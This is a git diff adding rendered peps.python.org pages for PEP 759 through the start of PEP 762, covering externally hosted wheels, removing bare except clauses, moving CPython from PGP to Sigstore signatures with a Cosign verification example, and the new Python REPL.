PEP 438 was complex, with three different “hosting modes”, rel metadata in +the simple HTML index pages to signify hosting locations, and a two-phase +transition plan affecting PyPI and installer tools. PEP 438 was ultimately +retracted in 2015 by PEP 470, which acknowledges that PEP 438 did succeed +in…

+
+
bringing about more people to utilize PyPI’s repository features, an +altogether good thing given the global CDN powering PyPI providing speed +ups for a lot of people[…]
+

Instead of external hosting, PEP 470 promoted the use of explicit multiple +repositories, providing full package indexing and artifact hosting, and +enabled through installer tool support, such as pip install +--extra-index-url allowing pip to essentially treat multiple +repositories as one single global repository +for package installation resolution. Because this has been the blessed norm +for so many years, all Python package installation tools support querying +multiple indexes for dependency resolution.

+
+
+

The problem with multiple indexes

+

Why then does this PEP propose to allow a more limited form of external +hosting, and how does this proposal avoid the problems documented in PEP 470?

+

One well-known problem that consolidating multiple indexes enables is +dependency confusion attacks, to +which Python can be particularly vulnerable, due to the algorithm that pip +install uses for resolving package dependencies and preferred versions. The +uv tool addresses this by supporting an additional index strategy option, +whereby users can select between, e.g. a pip-compatible strategy, and a +more limited strategy that prevents such dependency confusion attacks.

+

PEP 708 provides additional background about dependency confusion attacks, +and takes a different approach to preventing them. At its core, PEP 708 allows +repository owners to indicate that projects track across different +repositories, which allows installers to determine how to treat the global +package namespace when combined across multiple repositories. PEP 708 has been +provisionally accepted, pending several required conditions as outlined in PEP +708, some of which may have an indeterminate future. As PEP 708 itself says, +this won’t by itself solve dependency confusion attacks, but is one way to +provide enough information to installers to help minimize these attacks.

+

While there can still be valid use cases for standing up a totally independent +package index (such as providing richer platform support for GPUs until a +fully formed variant proposal +is accepted), this PEP takes a different, simpler approach and doesn’t replace +any of the existing, proposed, or approved package index cooperation +specifications.

+

This PEP also preserves the core purpose of PyPI, and allows it to +remain the traditional, canonical, centralized index of all Python +packages.

+
+
+

Addressing PyPI limits

+

This proposal also addresses the problem of size limits imposed by PyPI, where there is a +default artifact size limit of 100 MiB and a +default overall project size limit of 10 +GiB. Most packages and artifacts can easily fit in these limits, even for packages +containing binary extension modules for a variety of platforms. A small, but important +class of packages routinely exceed these limits, requiring them to submit PyPI exception +request support tickets. It’s not necessarily difficult to get resolution on such +exceptions, but it is a special process that can take some time to resolve, and the +criteria for granting such exceptions aren’t well documented.

+
+
+

Reducing operational complexity

+

Setting up and maintaining an entire package index can be a complex +operational solution, both time and resource intensive. This is especially +true if the main purpose of such an index is just to avoid file size +limitations. The external index approach also imposes a tricky UX on consumers +of projects on the external index, requiring them to understand how CLI +options such as --external-index-url work, along with the security +implications of such flags. It would be much easier for both producers and +consumers of large wheel packages to just set up and maintain a simple web +server, capable of serving individual files with no more complex API than +HTTP GET. Such an interface is also easily cacheable or placed behind a +CDN. Simple HTTP +servers are also much easier to audit for security purposes, easier to proxy, +and usually take much less resources to run, support, and maintain. Even +something like Amazon S3 could be used to +host external wheels.

+

This PEP proposes an approach that favors such operational simplicity.

+
+
+
+

Specification

+

A new type of uploadable file is defined, called a “RIM” (i.e. .rim), or “Remote +Installable Metadata” file. The name evokes the image of a wheel with the tire removed, +and emphasizes that .rim files are easily derived from .whl files. The process of +turning a .whl into a .rim is outlined below. The file name +format exactly matches the wheel file naming format specification, except that RIM files use the suffix +.rim. This means that all the tags used to discriminate .whl files also +distinguish between different .rim files, and thus can be used during dependency +resolution steps, exactly as .whl files are today. In this respect, .whl and +.rim files are interchangeable.

+

The content of a .rim file is nearly identical to .whl files, however .rim +files MUST contain only the .dist-info directory from a wheel. No other top-level +file or directory is allowed in the .rim zip file. The .dist-info directory +MUST contain a single additional file in addition to those allowed in a .whl +file’s .dist-info directory: a file called EXTERNAL-HOSTING.json.

+

This is a JSON file contains containing the following keys:

+
+
version
This is the file format version, which for this PEP MUST be 1.0.
+
owner
This MUST name the PyPI organization owner of this externally hosted file, for +reasons which will be described in detail below.
+
uri
This is a single URL naming the location of the physical .whl file hosted on an +external site. This URL MUST use the https scheme.
+
size
This is an integer value describing the size in bytes of the physical .whl file on +the remote host.
+
hashes
This is a dictionary of the format described in PEP 694, used to capture both the +PEP 694 of the physical .whl file, with the same +constraints as proposed in that PEP. Since these hashes are immutable once uploaded +to PyPI, they serve as a critical validation that the externally hosted wheel hasn’t +been corrupted or compromised.
+
+
+

Effects of the RIM file

+

The only effect of a .rim file is to change the download URL for the wheel artifact in +both the HTML and JSON interfaces in the simple repository API. In the HTML page for a +package release, the href attribute MUST be the value of the uri key, +including a #<hashname>=<hashvalue> fragment. this hash fragment MUST be in +exactly the same format as described the PEP 376 originated signed wheel file format +in the .dist-info/RECORD file. The exact same rules for selection of hash algorithm +and encoding is used here.

+

Similarly in the JSON response the url key pointing to the download file must be +the value of the uri key, and the hashes dictionary MUST be +included with values populated from the hashes dictionary provided above.

+

In all other respects, a compliant package index should treat .rim files the same as +.whl files, with some other minor exceptions as outlined below. For example, .rim +files can be deleted and yanked (PEP 592) just +like any .whl file, with the exact same semantics (i.e. deletions are permanent). When +a .rim is deleted, an index MUST NOT allow a matching .whl or .rim file to +be (re-)uploaded.

+
+
+

Availability order

+

Externally hosted wheels MUST be available before the corresponding .rim file is +uploaded to PyPI, otherwise a publishing race condition is introduced, although this +requirement MAY be relaxed for .rim files uploaded to a PEP 694 staged release.

+
+
+

Wheels can override RIMs

+

Indexes MUST reject .rim files if a matching .whl file already exists with the +exact same file name tags. However, indexes MAY accept a .whl file if a matching +.rim file exists, as long as that .rim file hasn’t been deleted or yanked. This +allows uploaders to replace an externally hosted wheel file with an index hosted wheel +file, but the converse is prohibited. Since the default is to host wheels on the same +package index that contains the package metadata, it is not allowed to “downgrade” an +existing wheel file once uploaded. When a .whl replaces a .rim, the index MUST +provide download URLs for the package using its own hosted file service. When uploading +the overriding .whl file, the package index MUST validate the hash from the +existing .rim file, and these hashes must match or the overriding upload MUST be +rejected.

+
+
+

PyPI API bump unnecessary

+

It’s likely that the changes are backward compatible enough that a bump in the PyPI +repository version is not necessary. Since .rim files are essentially changes only +to the upload API, package resolvers and package installers can continue to function with +the APIs they’ve always supported.

+
+
+
+

External hosting resiliency

+

One of the key concerns leading to PEP 438’s revocation in PEP 470 was +potential user confusion when an external index disappeared. From PEP 470:

+
+
This confusion comes down to end users of projects not realizing if a +project is hosted on PyPI or if it relies on an external service. This +often manifests itself when the external service is down but PyPI is +not. People will see that PyPI works, and other projects works, but this +one specific one does not. They oftentimes do not realize who they need to +contact in order to get this fixed or what their remediation steps are.
+

While the problem of external wheel hosting service going down is not directly +solved by this PEP, several safeguards are in place to greatly reduce the +potential burden on PyPI administrators.

+

This PEP thus proposes that:

+
    +
  • External wheel hosting is only allowed for packages which are owned by +organization accounts. +External hosting is an organization-wide setting.
  • +
  • Organization accounts do not automatically gain the ability to externally +host wheels; this feature MUST be explicitly enabled by PyPI admins at their discretion. Since +this will not be a common request, we don’t expect the overhead to be nearly +as burdensome as PEP 541 resolutions, account recovery requests, or even +file/project size increase requests. External hosting requests would be +handled in the same manner as those requests, i.e. via the PyPI GitHub +support tracker.
  • +
  • Organization accounts requesting external wheel hosting MUST register their own +support contact URI, be it a mailto URI for a contact email address, or the URL to +the organization’s support tracker. Such a contact URI is optional for organizations +which do not avail themselves of external wheel file hosting.
  • +
+

Combined with the EXTERNAL-HOSTING.json file’s owner key, this allows for +installer tools to unambiguously redirect any download errors away from the PyPI support +admins and squarely to the organization’s support admins.

+

While the exact mechanics of storing and retrieving this organization support +URL will be defined separately, for the sake of example, let’s say a package +foo externally hosts wheel files on `https://foo.example.com +<https://foo.example.com>`__ and that host becomes unreachable. When an +installer tool tries to download and install the package foo wheel, the +download step will fail. The installer would then be able to query PyPI to +provide a useful error message to the end user:

+
    +
  • The installer downloads the .rim file and reads the owner key from the +EXTERNAL-HOSTING.json file inside the .rim zip file.
  • +
  • The installer queries PyPI for the support URI for the organization +owner of the externally hosted wheel.
  • +
  • An informative error message would then be displayed, e.g.:
    +
    The externally hosted wheel file foo-....whl could not be +downloaded. Please contact support@foo.example.com for help. Do not report +this to the PyPI administrators.
    +
  • +
+
+
+

Dismounting wheels

+

It is generally very easy to produce a .rim file from an existing .whl +file. This could be done efficiently by a PEP 518 build backend with an +additional command line option, or a separate tool which takes a .whl file +as input and creates the associated .rim file. To complete the analogy, +the act of turning a .whl into a .rim is called “dismounting”. The +steps such a tool would take are:

+
    +
  • Accept as input the source .whl file, the organization owner of the +package, and URL at which the .whl will be hosted, and the support URI +to report download problems from. These could in fact be captured in the +pyproject.toml file, but that specification is out of scope for this +PEP.
  • +
  • Unzip the .whl and create the .rim zip archive.
  • +
  • Omit from the .rim file any path in the .whl that isn’t rooted +at the .dist-info directory.
  • +
  • Calculate the hash of the source .whl file.
  • +
  • Add the EXTERNAL-HOSTING.json file containing the JSON keys and values as described +above, to the .rim archive.
  • +
+
+
+

Changes to tools

+

Theoretically, installer tools shouldn’t need any changes, since when they +have identified the wheel to download and install, they simply consult the +download URLs returned by PyPI’s Simple API. In practice though, tools such as +pip and uv may have constrained lists of hosts they will allow +downloads from, such as PyPI’s own pythonhosted.org domain.

+

In this case, such tools will need to relax those constraints, but the exact policy for +this is left to the installer tools themselves. Any number of approaches could be +implemented, such as downloading the .rim file and verifying the +EXTERNAL-HOSTING.json metadata, or simply trusting the external downloads for any +wheel with a matching checksum. They could also query PyPI for the project’s organization +owner and support URI before trusting the download. They could warn the user when +externally hosted wheel files are encountered, and/or require the use of a command line +option to enable additional download hosts. Any of these verification policies could be +chosen in configuration files.

+

Installer tools should also probably provide better error messages when +externally hosted wheels cannot be downloaded, e.g. because a host is +unreachable. As described above, such tools could query enough metadata from +PyPI to provide clear and distinct error messages pointing users to the +package’s external hosting support email or issue tracker.

+
+
+

Constraints for external hosting services

+

The following constraints lead to reliable and compatible external wheel hosting services:

+
    +
  • External wheels MUST be served over HTTPS, with a certificate signed by +Mozilla’s root certificate store. This ensures +compatibility with pip +and uv. At +the time of this writing, pip 24.2 on Python 3.10 or newer uses the system +certificate store in addition to the Mozilla store provided by the third party certifi Python package. uv uses the Mozilla store +provided by the webpki-roots crate, but not +the system store unless the --native-tls flag is given [1]. The PyPI +administrators may modify this requirement in the future, but compatibility with popular +installers will not be compromised.
  • +
  • External wheel hosts SHOULD use a content delivery network (CDN), just as PyPI does.
  • +
  • External wheel hosts MUST commit to a stable URL for all wheels they host.
  • +
  • Externally hosted wheels MUST NOT be removed from an external wheel host unless the +corresponding .rim file is deleted from PyPI first, and MUST NOT remove external +wheels for yanked releases.
  • +
  • External wheel hosts MUST support HTTP range requests.
  • +
  • External wheel hosts SHOULD support the HTTP/2 protocol.
  • +
+
+
+

Security

+

Several factors as described in this proposal should mitigate security +concerns with externally hosted wheels, such as:

+
    +
  • Wheel file checksums MUST be included in .rim files, and once uploaded cannot be +changed. Since the checksum stored on PyPI is immutable and required, it is not possible +to spoof an external wheel file, even if the owning organization lost control of their +hosting domain.
  • +
  • Externally hosted wheels MUST be served over HTTPS.
  • +
  • In order to serve externally hosted wheels, organizations MUST be approved by the +PyPI admins.
  • +
+

When users identify malware or vulnerabilities in PyPI-hosted projects, they can now +report this using the malware reporting facilities on +PyPI, as also described in this blog post. The same process can be used to report +security issues in externally hosted wheels, and the same remediation process should be +used. In addition, since organizations with external hosting enabled MUST provide a +support contact URI, that URI can be used in some cases to report the security issue to +the hosting organization. Such organization reporting won’t make sense for malware, but +could indeed be a very useful way to report security vulnerabilities in externally hosted +wheels.

+
+
+

Rejected ideas

+

Several ideas were considered and rejected.

+
    +
  • Requiring digital signatures on externally hosted wheel files, either in +addition to or other than hashes. We deem this unnecessary since the +checksum requirement should be enough to validate that the metadata on PyPI +for a wheel exactly matches the downloaded wheel. The added complexity of +key management outweighs any additional benefit such digital signatures +might convey.
  • +
  • Hash verification on .rim file uploads. PyPI could verify that the hash in the +uploaded .rim file matches the externally hosted wheel before it accepts the upload, +but this requires downloading the external wheel and performing the checksum, which also +implies that the upload of the .rim file cannot be accepted until this external +.whl file is downloaded and verified. This increases PyPI bandwidth and slows down +the upload query, although PEP 694 draft uploads could potentially mitigate these +concerns. Still, the benefit is not likely worth the additional complexity.
  • +
  • Periodic verification of the download URLs by the index. PyPI could try to periodically +ensure that the external wheel host or the external .whl file itself is still +available, e.g. via an HTTP HEAD request. This is likely overkill and without also +providing the file’s checksum in the response [2], may not provide much additional +benefit.
  • +
  • This PEP could allow for an organization to provide fallback download hosts, +such that a secondary is available if the primary goes down. We believe +that DNS-based replication is a much better, well-known technique, and +probably much more resilient anyway.
  • +
  • .rim file replacement. While it is allowed for .whl files to replace +existing .rim files, as long as a) the .rim file hasn’t been deleted +or yanked, b) the checksums match, we do not allow replacing .whl files +with .rim files, nor do we allow a .rim file to overwrite an +existing .rim file. This latter could be a technique to change the +hosting URL for an externally hosted .whl; however, we do not think this +is a good idea. There are other ways to “fix” an external host URL as +described above, and we do not want to encourage mass re-uploads of existing +.rim files.
  • +
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0759.rst

+

Last modified: 2024-10-09 20:11:15 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0760/index.html b/pep-0760/index.html new file mode 100644 index 00000000000..fbc8f964b05 --- /dev/null +++ b/pep-0760/index.html @@ -0,0 +1,328 @@ + + + + + + + + PEP 760 – No More Bare Excepts | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 760 – No More Bare Excepts

+
+
Author:
+
Pablo Galindo <pablogsal at python.org>, Brett Cannon <brett at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
02-Oct-2024
+
Python-Version:
+
3.14
+
Post-History:
+
09-Oct-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes disallowing bare except: clauses in Python’s +exception-handling syntax. Currently, Python allows catching all exceptions +with a bare except: clause, which can lead to overly broad exception +handling and mask important errors. This PEP suggests requiring explicit +exception types in all except clauses, promoting more precise and intentional +error handling.

+
+
+

Motivation

+

The current syntax allows for catching all exceptions with a bare except: clause:

+
try:
+    risky_operation()
+except:
+    handle_any_error()
+
+
+

While this syntax can be convenient for a “catch all” handler, it often leads +to poor coding practices:

+
    +
  1. It can mask important errors that should be propagated.
  2. +
  3. It makes debugging more difficult by catching and potentially hiding +unexpected exceptions.
  4. +
  5. It goes against the Python principle of explicit over implicit.
  6. +
+

Various linters [1] [2] [3] and style guides (including PEP 8) [4] [5] +[6] [7] discourage bare except clauses.

+

By requiring explicit exception types, we can encourage more thoughtful and +precise error handling:

+
try:
+    risky_operation()
+except Exception as e:
+    handle_expected_error(e)
+
+
+

Another view of this problem is that bare except handlers are ambiguous +regarding the intended handling of terminating exceptions, as the intention +could have been either:

+
    +
  • Only catch non-terminating exceptions (except Exception:). If this was the +intention, using a bare except: is an outright bug, since that isn’t what it +means.
  • +
  • Catch all exceptions, including terminating ones (except BaseException:). +using bare except: here it is at least correct, but readers need to check +to be sure it isn’t an instance of the first case.
  • +
+

Since both possible intentions have available unambiguous spellings, the +ambiguous form is redundant and that’s why we propose to disallow it.

+
+
+

Rationale

+

The decision to disallow bare except clauses is based on the following +considerations:

+
    +
  1. Requiring specific exception types makes the programmer’s intentions clear +and encourages thinking about what exceptions might occur.
  2. +
  3. Catching only specific exceptions makes identifying and debugging unexpected +errors easier.
  4. +
  5. Preventing overly broad exception handling reduces the risk of silently +ignoring critical errors.
  6. +
  7. Many style guides and linters already discourage the use of bare except +clauses.
  8. +
+
+
+

Specification

+

The syntax for the except clause will be modified to require an exception type. +The grammar will be updated to remove the possibility of adding an empty +expression in except clauses.

+

This change disallows the bare except: syntax. All except clauses must +specify at least one exception type:

+
try:
+    ...
+except ValueError:
+    ...
+except (TypeError, RuntimeError):
+    ...
+except Exception:
+    ...  # Still allowed, but catches all exceptions explicitly
+
+
+

The semantics of exception handling remain unchanged, except that it will no +longer be possible to catch all exceptions without explicitly specifying +BaseException or a similarly broad exception type.

+
+
+

Backwards Compatibility

+

This change is not backwards compatible. Existing code that uses bare except: +clauses will need to be modified. To ease the transition:

+
    +
  1. A deprecation warning will be issued for bare except clauses in Python 3.14.
  2. +
  3. The syntax will be fully disallowed in Python 3.17.
  4. +
  5. A from __future__ import strict_excepts will be provided to invalidate bare +except handlers in earlier versions of Python.
  6. +
+

A tool will be provided to automatically update code to replace bare except: +with except BaseException:.

+
+
+

Security Implications

+

This change has no security implications.

+
+
+

How to Teach This

+

For new Python users, exception handling should be taught with explicit +exception types from the start:

+
try:
+    result = risky_operation()
+except ValueError:
+    handle_value_error()
+except TypeError:
+    handle_type_error()
+except Exception as e:
+    handle_unexpected_error(e)
+
+
+

For experienced users, the change can be introduced as a best practice that is +now enforced by the language. The following points should be emphasized:

+
    +
  1. Always catch specific exceptions when possible.
  2. +
  3. Use except Exception: as a last resort for truly unexpected errors.
  4. +
  5. Never silence exceptions without careful consideration.
  6. +
+

Documentation should guide common exception hierarchies and how to choose +appropriate exception types to catch.

+
+
+

Rejected ideas

+
    +
  • There are genuine cases where the use of bare except: handlers are correct. one +of the examples that have been raised from Mailman [8] involves handling transactions +in the face of any exception:
    +
    @contextmanager
    +def transaction():
    +    """Context manager for ensuring the transaction is complete."""
    +    try:
    +        yield
    +    except:
    +        config.db.abort()
    +        raise
    +    else:
    +        config.db.commit()
    +
    +
    +
    +

    This code guarantees that no matter what exception occurs, any open +transaction will be aborted, while in the successful condition, the +transaction will be committed.

    +

    We do believe that although there are cases such like this one where +bare except: handlers are correct, it would be better to actually +be explicit and use except BaseException: for the reasons indicated +in the “Motivation” section.

    +
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0760.rst

+

Last modified: 2024-10-09 20:43:34 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0761/index.html b/pep-0761/index.html new file mode 100644 index 00000000000..63f6e673ff5 --- /dev/null +++ b/pep-0761/index.html @@ -0,0 +1,409 @@ + + + + + + + + PEP 761 – Deprecating PGP signatures for CPython artifacts | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 761 – Deprecating PGP signatures for CPython artifacts

+
+
Author:
+
Seth Michael Larson <seth at python.org>
+
Sponsor:
+
Hugo van Kemenade
+
Discussions-To:
+
Discourse thread
+
Status:
+
Active
+
Type:
+
Process
+
Created:
+
08-Oct-2024
+
Python-Version:
+
3.14
+
Post-History:
+
25-Sep-2024, 09-Oct-2024
+
Resolution:
+
06-Nov-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

Since Python 3.11.0, CPython has provided two verifiable digital signatures +for all CPython artifacts: PGP and Sigstore.

+

PGP’s design requires the maintenance and protection of long-lived private +keys by trusted +parties. PGP’s security and ergonomics have been criticized by security +practitioners +for many years now, with the biggest issue being that there were few +alternatives for “artifact signing” being proposed or adopted.

+

Sigstore’s design philosophy has focused on the +ergonomics of signing and verifying and uses short-lived keys with +strongly-bound human-readable identities via OpenID Connect. +Sigstore has both development and adoption momentum, seeing adoption by PyPI, +NPM, Homebrew, and GitHub, among other ecosystems.

+

This PEP proposes to move CPython to using Sigstore exclusively for signing +artifacts through a deprecation and eventual discontinuance of providing PGP +signatures with new release managers.

+
+
+

Motivation

+

CPython’s releases are release-manager-centric, where a single person +maintains multiple CPython releases from pre-release to end-of-life over the +course of many years.

+

Requiring release managers to maintain and protect PGP private keys for seven +or more years is an unnecessary burden in the new age of ergonomic and +ephemeral signing keys. Comparatively, Sigstore only requires release managers +to click a button during the release process to OAuth sign-on to their +identity provider. Maintaining the integrity of accounts on identity providers +like GitHub is already an expectation of being a Python release manager or +core team member, such as through multi-factor authentication and strong +unique passwords.

+
+
+

Rationale

+
+

Preserve expectations across a Python release

+

To avoid breaking downstream verifiers, the expectations for verification +materials availability SHOULD NOT be changed during a feature release’s +lifecycle.

+
+
+

Release managers, not releases

+

The discontinuation of PGP signatures doesn’t necessarily have to happen +on a “release manager boundary”; a new Python release could be a potential +boundary.

+

Because the primary motivation for deprecating PGP is ergonomics, deciding +to drop PGP for one release while a release manager still has obligations to +provide PGP signatures for other releases for multiple years isn’t much +savings of effort.

+

A new release manager also represents a new PGP public key that downstream +verifiers need to adopt. By choosing to make the change during this period, +this minimizes the breakage to a place in downstream maintenance where a +change will already be necessary.

+
+
+

Gordian knot of signing methods and verifiers

+

CPython providing both PGP and Sigstore signatures concurrently creates a +“Gordian knot” where +verifiers are disincentivized to migrate to a new signature method due to the +continued and expected availability of an existing signature method, thus +propagating the apparent demand for maintaining the existing signature +method.

+

This situation slows down the adoption of new signature methods like Sigstore for +both signature-producing projects and signature-verifying ecosystems by not +creating a “need” to automate and integrate the signature method into verifier +tooling.

+

By changing the expectation of what future signature methods will be +available, the incentive-knot can be broken by spurring the adoption of the +new signature method in downstream tooling. +This change to verifier tooling also makes other upstream projects able to +migrate to publishing only Sigstore signatures, resulting in a positive +feedback loop of adoption.

+
+
+
+

Specification

+

Because PGP keys are tied to a release manager identity, the change to +availability of PGP signatures will be tied to release managers instead of +individual releases (3.13, 3.14, etc). This PEP both deprecates and proposes +a discontinuation timeline for PGP signatures.

+
+

Deprecation and discontinuation of PGP signatures

+

This PEP deprecates PGP signatures for future CPython releases and recommends +verifiers to adopt Sigstore to verify CPython artifacts as an alternative to +PGP.

+

This PEP also removes the expectation that PGP signatures be published by +future release managers that don’t already maintain a stable Python release. +At the time of writing this would be Hugo van Kemenade, as 3.14 is the next +Python version without a stable release.

+

Releases which already have a stable release (3.13, 3.12, 3.11, etc) are not +affected and will continue to provide PGP signatures for artifacts until they +are end-of-life. All existing PGP signatures will continue to work as +expected.

+
+
+

Delaying discontinuation of PGP signatures

+

This PEP provides a mechanism to delay the discontinuation of PGP signatures +from active and upcoming CPython releases in case of extraordinary +circumstances. Deprecation of PGP signatures can’t be changed without a +superseding PEP.

+

The Steering Council MAY at a future date after this PEP’s acceptance decide +to delay the discontinuation of PGP signatures to a future CPython release. +If the Steering Council decides to delay the discontinuation of PGP signatures +then all active release managers MUST provide PGP signatures for their covered +CPython artifacts for the remainder of their tenure as a release manager. This +includes all steps required to do so, such as generating a new PGP key and +publishing their identity to python.org.

+

The discontinuation of PGP signatures then is automatically scheduled for the +next release manager without a stable release, to be highlighted in the +Steering Council decision.

+
+
+
+

Backwards Compatibility

+

This proposal would remove the ability to verify future CPython artifacts +using PGP. Any downstream verifiers using PGP for CPython artifacts would +need to either start using Sigstore, verify their source code of CPython +through other means, or stop verification altogether for future CPython +releases.

+
+
+

Security Implications

+

PGP and Sigstore have different security models, so by removing PGP +signatures this means that all users only have the option to rely on the +security model provided by Sigstore.

+

In general, the security model required for artifact signatures is being +able to detect whether a given artifact is from the expected source and +hasn’t been modified, regardless of the security or integrity of the hosting +service (in CPython’s case: python.org/downloads).

+

Sigstore’s security model +depends more on centralized infrastructure compared to PGP, such as the +“public good” signature transparency log (Rekor), certificate authority and +transparency log (Fulcio), and the security of OpenID Connect identity +providers like Google and GitHub.

+

CPython’s development already depends on the security of some of these +services and the others are better resourced than any individual release +manager to provide long-term public key management.

+
+
+

How to Teach This

+

CPython already documents +how to verify artifacts using Sigstore based on the pre-published identities +of release managers. Documentation will be updated to indicate the deprecation +and future expectations of PGP signatures.

+

Verifying signatures of CPython artifacts isn’t something we should expect +from new Python users. Instead, Sigstore is more likely to be a part of a +downstream integrator’s build pipeline such as a Linux distro, Homebrew, pyenv, +or others that programmatically fetch and build CPython from source.

+
+
+

Rejected Ideas

+
+

Continue publishing PGP signatures indefinitely

+

Being a release manager is already a difficult, time-consuming, and long-term +commitment that is typically done on a volunteer basis. Thus we see removal +of PGP key management duties as a step towards reducing burnout and stress +of future release managers and improving the sustainability of CPython.

+
+
+

Removing previous PGP signatures

+

This PEP doesn’t intend to break any infrastructure built around existing Python +versions, instead only changing the expectations around future Python versions. +Thus all PGP signatures that are already available on python.org will continue +to be available even after PGP discontinuance.

+
+
+
+

Appendix

+
+

Support for offline verification

+

During the pre-PEP discussion, +there was a question of whether offline verification was supported by +Sigstore. Using a Sigstore bundle (.sigstore) file, Sigstore clients +support verifying the artifact completely offline.

+

Using offline verification with Sigstore requires disabling root of trust +updates and “pinning” a root of trust in a file to use during verification.

+

Pinning a root of trust means signatures made after a new root of trust +is established would no longer be able to verify using a “pinned” previous +root of trust. New roots of trust are expected to be rare events, such as +when the root of trust is compromised, and in this case verifiers would +want signatures to fail to verify.

+

Offline verification also makes revocation checks impossible, but this +is similar to PGP’s model where revocation of keys requires an online lookup.

+

Barring rare events like root of trust compromise, using offline verification +with Sigstore doesn’t impose additional operations requirements to verifiers.

+
+
+

Support for a pre-compiled executable for verification

+

During discussion there were requests for a pre-compiled executable that could +be used for verifying Sigstore bundles without needing to either install +a Go build toolchain to build sigstore-go +from source or already have a working Python installation for +sigstore-python.

+

Cosign is another Sigstore project +that provides pre-compiled standalone binaries and supports verifying bundles +offline:

+
# Download Cosign
+wget https://github.com/sigstore/cosign/releases/download/v2.4.1/cosign-linux-amd64
+
+# For offline verification, also need the Root of Trust. Can be grabbed
+# from GitHub at: https://github.com/sigstore/root-signing/blob/main/targets/trusted_root.json
+wget https://raw.githubusercontent.com/sigstore/root-signing/refs/heads/main/targets/trusted_root.json
+
+# Download CPython artifacts
+wget https://www.python.org/ftp/python/3.13.0/Python-3.13.0.tgz
+wget https://www.python.org/ftp/python/3.13.0/Python-3.13.0.tgz.sigstore
+
+./cosign-linux-amd64 verify-blob \
+  --new-bundle-format \
+  --certificate-oidc-issuer 'https://accounts.google.com' \
+  --certificate-identity 'thomas@python.org' \
+  --bundle ./Python-3.13.0.tgz.sigstore \
+  # --offline and --trust-root optional for offline verification
+  --offline \
+  --trust-root ./trusted_root.json \
+  ./Python-3.13.0.tgz
+
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0761.rst

+

Last modified: 2024-11-06 19:20:02 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0762/index.html b/pep-0762/index.html new file mode 100644 index 00000000000..ec52f767af9 --- /dev/null +++ b/pep-0762/index.html @@ -0,0 +1,374 @@ + + + + + + + + PEP 762 – REPL-acing the default REPL | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 762 – REPL-acing the default REPL

+
+
Author:
+
Pablo Galindo Salgado <pablogsal at python.org>, Łukasz Langa <lukasz at python.org>, Lysandros Nikolaou <lisandrosnik at gmail.com>, Emily Morehouse-Valcarcel <emily at python.org>
+
Sponsor:
+
Pablo Galindo Salgado
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
11-Oct-2024
+
Python-Version:
+
3.13
+
+
+
+
Table of Contents +
+
+

Abstract

+

One of Python’s core strengths is its interactive mode, also known as the +Read-Eval-Print Loop (REPL), or the Python console, or the Python shell. This +PEP describes the new implementation of this functionality written in Python. +The new REPL released in Python 3.13 aims to provide modern features expected by +today’s users, such as multi-line editing, syntax highlighting, custom commands, +and an overall improved interactive experience.

+
+
+

Motivation

+

Up to Python 3.12, the interactive shell of CPython was written in C as a +special mode of the parser. It was therefore difficult to maintain and extend. +It relied on the existence of GNU readline (or an equivalent) for basic +functionality like cursor movement and history tracking. Python compiled without +this library provided an interactive mode of very limited capability. On the +other hand, Python compiled with readline outsourced decisions and configuration +around user input in ways that made extending it difficult.

+

This complexity has deterred contributions and has made it challenging to +implement new features. As a result, the CPython interactive shell has seen +minimal changes, falling behind user expectations for modern equivalents.

+

Many features that users have come to expect from modern REPLs were absent in +the previous version. Some examples of these features include multi-line editing +and history, custom commands, syntax highlighting, or ergonomic handling of copy +and paste. The lack of these features greatly impacts the user experience of +many groups of users of CPython, in particular in environments where users don’t +control dependencies and cannot install their own packages. This is especially +common for users learning the language and educators.

+

Addressing such issues with the C implementation would require complex +workarounds, such as AST matching of commands, which would add prohibitive +complexity to the codebase.

+

With the new REPL written in Python, we are addressing these limitations while +also bringing CPython’s interactive experience more in line with modern +expectations and capabilities.

+
+
+

Rationale

+

Implementing the new REPL in Python, rather than C, has significantly lowered +the barrier to entry for contributors. This change has made it easier to test, +validate, and modify the REPL, leading to increased community involvement and +faster feature development. The improved accessibility of the codebase is +expected to result in a more rapidly evolving and user-responsive REPL.

+

Instead of writing a Python REPL from scratch, we decided to base the +implementation of the new REPL on PyREPL. +This decision was driven by several key factors. First and foremost, +developing a terminal application that works consistently across different +operating systems and terminal emulators is a complex undertaking. +By adopting PyREPL, which has been battle-tested in the PyPy project, +we can leverage existing, proven code rather than starting from scratch.

+

Sharing a codebase with PyPy for the REPL implementation offers mutual benefits +to both projects. It allows for shared maintenance efforts, faster bug fixes, +and feature improvements that can benefit users of both CPython and PyPy. This +collaboration can lead to a more robust and feature-rich REPL for the entire +Python ecosystem.

+

The previous REPL written in C leveraged the “readline” or “editline” libraries +as a backend to allow certain features such as navigation, history preservation +and recall, autocompletion, and configurable keyboard behavior. PyREPL does not +use those libraries, implementing most of the other functionality directly as +part of the shell. The main missing functionality (configurability of input) is +outweighed by the benefits of the new architecture. The configuration files for +these libraries (e.g. inputrc) are complex and include features that PyREPL +doesn’t plan to implement, making it infeasible to transparently add support for +them in the new shell. Using “readline” or “editline” in PyREPL would be +prohibitively complex due to multi-line editing handling and multiplatform +support.

+

